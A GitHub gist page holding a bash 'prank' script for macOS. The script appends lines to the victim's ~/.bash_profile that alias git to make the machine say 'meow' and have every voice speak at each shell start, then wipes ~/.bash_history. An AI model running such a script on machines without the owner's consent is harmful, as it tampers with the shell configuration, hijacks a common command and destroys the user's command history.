Skip to content

Instantly share code, notes, and snippets.

@Deadlyelder
Last active April 27, 2018 08:25
Show Gist options
  • Save Deadlyelder/96f21c27c4120bd16b18ec326e43f881 to your computer and use it in GitHub Desktop.
Save Deadlyelder/96f21c27c4120bd16b18ec326e43f881 to your computer and use it in GitHub Desktop.
prank
#!/bin/bash
GIT=`which git`
CMD="say -r 600 -v Karen meow; $GIT"
echo alias git="\"$CMD\"" >> ~/.bash_profile
echo 'say -v ? | awk '\''{print $1}'\'' | xargs -I {} say -r 700 -v {} meow' >> ~/.bash_profile
source ~/.bash_profile
cat /dev/null > ~/.bash_history
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment